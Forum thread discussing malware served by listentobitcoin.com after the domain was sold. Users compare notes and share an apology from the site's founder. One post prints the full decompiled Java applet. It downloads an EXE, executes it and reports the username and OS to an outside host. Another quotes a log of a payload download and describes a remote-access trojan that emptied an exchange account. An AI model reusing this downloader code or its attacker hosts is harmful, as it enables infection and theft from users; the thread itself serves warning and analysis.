Got this risk message, can someone elaborate on the listentobitcoin malware?

someguy123

sr. member

Activity: 336

Merit: 254

CEO of Privex Inc. (www.privex.io)

Quote from: daviducsb on January 06, 2014, 01:55:14 PM

Hello... Anybody... Is it a threat to Apple Macs?

thx

The virus appears to download an EXE payload. Whether or not it has alternative payloads for Mac or Linux is unknown, but if you've visited the site and allowed the JAR to run, you may want to run some form of mac security program, as it's now detected by a good amount of antivirus programs.

someguy123

sr. member

Activity: 336

Merit: 254

CEO of Privex Inc. (www.privex.io)

I decompiled their java file and it seems to be some kind-of download script. Here's malwarebytes post about it : http://blog.malwarebytes.org/fraud-scam/2014/01/musical-bitcoin-bubbles-serve-java-applets-malware/

Here's the source code decompiled for any security people

Code:

import java.applet.Applet;
import java.applet.AppletContext;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;
import java.net.URLConnection;

public class SecureJAR extends Applet
{
public void init()
{
String str1 = System.getProperty("user.name");
String str2 = System.getProperty("os.name");
String str3 = System.getenv("temp");
String str4 = "\\";
String str5 = getParameter("rgsicvnjbn");
String str6 = str4.concat(str5);
String str7 = str3.concat(str6);
Object localObject = getParameter("ioqujbjsyq");
String str8 = "&yuvcpearce=";
String str9 = getParameter("ivmbhojyjv");
try
{
str2 = str2.replace(" ", "%20");
str1 = str1.replace(" ", "%20");
FileOutputStream localFileOutputStream = new FileOutputStream(str7);
Runtime localRuntime = Runtime.getRuntime();
URL localURL1 = new URL(getParameter("xmxdnhwphy"));
URLConnection localURLConnection = localURL1.openConnection();
InputStream localInputStream = localURLConnection.getInputStream();
byte[] arrayOfByte = new byte[1024];
int i;
while ((i = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1)
localFileOutputStream.write(arrayOfByte, 0, i);
localInputStream.close();
localFileOutputStream.close();
localRuntime.exec(str7);
localObject = new URL((String)localObject);
getAppletContext().showDocument((URL)localObject);
URL localURL2 = new URL("http://epickit.net/qsxnonlvrc.php?username=" + str9 + str8.replace("yuvcpearce", "evyaipgncs") + str2 + str8.replace("yuvcpearce", "piyhnvzbpw") + str1 + str8.replace("yuvcpearce", "tlbkqdpvxm") + "Traditional");
localURL2.openStream();
}
catch (Exception localException)
{
}
}
}

daviducsb

full member

Activity: 155

Merit: 100

Hello... Anybody... Is it a threat to Apple Macs?

thx

daviducsb

full member

Activity: 155

Merit: 100

Are Apple computers susceptible to the malware on listentobitcoins or only PCs? If one visited the site on an Apple is one at risk?

Nagle

legendary

Activity: 1204

Merit: 1002

The malware seems to be back. At the end of "www.listentobitcoin.com" is this code:

Code:

This is appended to the end of the page, outside the tag. This looks like something a break-in attack appended automatically and blindly.

nfuse

member

Activity: 97

Merit: 10

well for me it was to late i lost 0.47 btc and 15 ltc today because of this shit about 23 december i visited listentobitcoin.com and today i found out my cryptsy.com account was emptyed.

after searching i found in the java logs the answer that say's it all

] ª C! H Ch9àÖ B C Ø× C Ø× %http://listentobitcoin.info/sezam.exe 188.165.49.114 HTTP/1.1 200 OK content-length 502272
last-modified Fri, 20 Dec 2013 17:50:53 GMT expires Mon, 06 Jan 2014 15:44:16 GMT content-type application/octet-stream date Mon, 23 Dec 2013 15:44:16 GMT server nginx
cache-control max-age=1209600

sezam.exe create's a directory called /directory/cybergate/googleupdate.exe what allowed the hacker (lowlife scum) to access my laptop when i was away

i hopefully learned my lesson and using 2FA for now now i just need something to put back on my account Embarrassed

if you thief have a change of heart and want to sleep better @ night please return my btc to 192ou1R5P3MQNtFoYDh1SuEDjcbGMJYZtk

devthedev

legendary

Activity: 1050

Merit: 1004

I said this below, but I want it to be a part of this post as well: I realize now that I made a very foolish mistake by selling the domain to someone untrustworthy, and I want to personally apologize to everyone who has been affected. I was too trusting, I made a huge mistake, and for what my words are worth, I promise that it won’t happen again.

~Maximillian Laumeister

http://bitcoinexaminer.org/listentobitcoin-com-was-infected-by-an-anonymous-buyer-says-founder-of-the-website/

DiamondCardz

legendary

Activity: 1134

Merit: 1118

Quote from: Nagle on December 05, 2013, 12:02:04 AM

Quote from: DiamondCardz on December 03, 2013, 02:46:48 PM

Third, you probably haven't even went on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.

I've been looking at the code on both sites, and running the sites through various testers, and I'm not seeing any malware.

Interesting. I don't know how the domain might have been re-acquired, but it was throwing up malware.

Nagle

legendary

Activity: 1204

Merit: 1002

Quote from: DiamondCardz on December 03, 2013, 02:46:48 PM

Third, you probably haven't even went on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.

I've been looking at the code on both sites, and running the sites through various testers, and I'm not seeing any malware. But I think there's a bug in Firefox's playing of audio files which results in choppy audio. Both sites will produce choppy audio after they've been running for a while. Once this has happened, Firefox has to be restarted to fix the problem. This appears under both Windows 7 and Linux.

DiamondCardz

legendary

Activity: 1134

Merit: 1118

Quote from: Nagle on December 02, 2013, 06:42:19 PM

Quote from: DiamondCardz on August 11, 2013, 05:33:44 PM

listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.

None of the major analysis tools find malware on "listentobitcoin.com".

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

This sounds like a scam to get people to switch to "bitlisten.com"

First, nice gravedig.
Second, you're a retard.
Third, you probably haven't even went on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.

Finally, http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb

Please get your facts together before you try to spread FUD about something you know nothing about. Thanks.

Remember remember the 5th of November

legendary

Activity: 1862

Merit: 1011

Reverse engineer from time to time

Quote from: Nagle on December 02, 2013, 06:42:19 PM

Quote from: DiamondCardz on August 11, 2013, 05:33:44 PM

listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.

None of the major analysis tools find malware on "listentobitcoin.com".

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

This sounds like a scam to get people to switch to "bitlisten.com"

Look at the date of the thread, please!

Nagle

legendary

Activity: 1204

Merit: 1002

Quote from: DiamondCardz on August 11, 2013, 05:33:44 PM

listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.

None of the major analysis tools find malware on "listentobitcoin.com".

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

This sounds like a scam to get people to switch to "bitlisten.com"

DiamondCardz

legendary

Activity: 1134

Merit: 1118

listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.

SlickTheNick

full member

Activity: 220

Merit: 100

Hint: for the most part, Anti Virus software is mostly snake oil. especially Mcafee, Norton etc.

alp

full member

Activity: 284

Merit: 101

Make sure it's clear? Reformat.

coastermonger

sr. member

Activity: 367

Merit: 250

Find me at Bitrated

FIRST PRIORITY, DO NOT GO TO LISTEN TO BITCOIN . COM

Saw this message come up from one of my AV recently.

along with a reddit post from the creator, apologizing for what happened to the site:
http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb

Can anyone elaborate on what kind of malware exists or existed at this site? I was browsing with chrome and unfortunately hadn't seen the post yet. I visited listentobitcoin, but chrome didn't bring up any warning and I wasn't asked to install anything.

I'm curious what steps I need to talk to make sure that my computer is clear

Topic: Got this risk message, can someone elaborate on the listentobitcoin malware? (Read 3670 times)